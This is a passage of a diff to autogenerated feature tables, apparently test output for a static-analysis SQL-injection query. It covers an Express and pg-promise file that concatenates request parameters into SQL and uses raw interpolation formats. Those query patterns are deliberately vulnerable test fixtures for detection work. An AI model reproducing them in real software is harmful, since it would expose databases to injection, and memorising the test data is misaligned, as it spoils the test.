get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:38:7:55 | "' ORDER BY PRICE" | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:38:7:55 | "' ORDER BY PRICE" | stringConcatenatedWith | 'SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='' + req.params.category -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:8 | db.any | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:8 | db.any | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:8 | db.any | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:8 | db.any | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:8 | db.any | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | db.any(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | db.any(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | db.any(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | db.any(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | db.any(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | exceptional return of db.any(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | exceptional return of db.any(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | exceptional return of db.any(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | exceptional return of db.any(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:3:9:15 | exceptional return of db.any(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:6:9:8 | any | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:6:9:8 | any | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:6:9:8 | any | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:6:9:8 | any | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:6:9:8 | any | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:10:9:14 | query | CalleeFlexibleAccessPath | db.any | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:10:9:14 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:10:9:14 | query | calleeImports | pg-promise | @@ -3510,6 +17484,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:10:9:14 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:10:9:14 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:9:10:9:14 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:9 | db.many | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:9 | db.many | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:9 | db.many | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:9 | db.many | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:9 | db.many | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | db.many(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | db.many(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | db.many(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | db.many(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | db.many(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | exceptional return of db.many(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | exceptional return of db.many(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | exceptional return of db.many(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | exceptional return of db.many(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:3:10:16 | exceptional return of db.many(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:6:10:9 | many | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:6:10:9 | many | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:6:10:9 | many | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:6:10:9 | many | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:6:10:9 | many | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:11:10:15 | query | CalleeFlexibleAccessPath | db.many | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:11:10:15 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:11:10:15 | query | calleeImports | pg-promise | @@ -3519,6 +17518,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:11:10:15 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:11:10:15 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:10:11:10:15 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:15 | db.manyOrNone | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:15 | db.manyOrNone | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:15 | db.manyOrNone | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:15 | db.manyOrNone | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:15 | db.manyOrNone | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | db.manyOrNone(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | db.manyOrNone(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | db.manyOrNone(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | db.manyOrNone(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | db.manyOrNone(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | exceptional return of db.manyOrNone(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | exceptional return of db.manyOrNone(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | exceptional return of db.manyOrNone(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | exceptional return of db.manyOrNone(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:3:11:22 | exceptional return of db.manyOrNone(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:6:11:15 | manyOrNone | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:6:11:15 | manyOrNone | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:6:11:15 | manyOrNone | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:6:11:15 | manyOrNone | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:6:11:15 | manyOrNone | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:17:11:21 | query | CalleeFlexibleAccessPath | db.manyOrNone | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:17:11:21 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:17:11:21 | query | calleeImports | pg-promise | @@ -3528,6 +17552,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:17:11:21 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:17:11:21 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:11:17:11:21 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:8 | db.map | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:8 | db.map | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:8 | db.map | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:8 | db.map | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:8 | db.map | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | db.map(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | db.map(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | db.map(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | db.map(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | db.map(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | exceptional return of db.map(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | exceptional return of db.map(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | exceptional return of db.map(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | exceptional return of db.map(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:3:12:15 | exceptional return of db.map(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:6:12:8 | map | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:6:12:8 | map | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:6:12:8 | map | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT 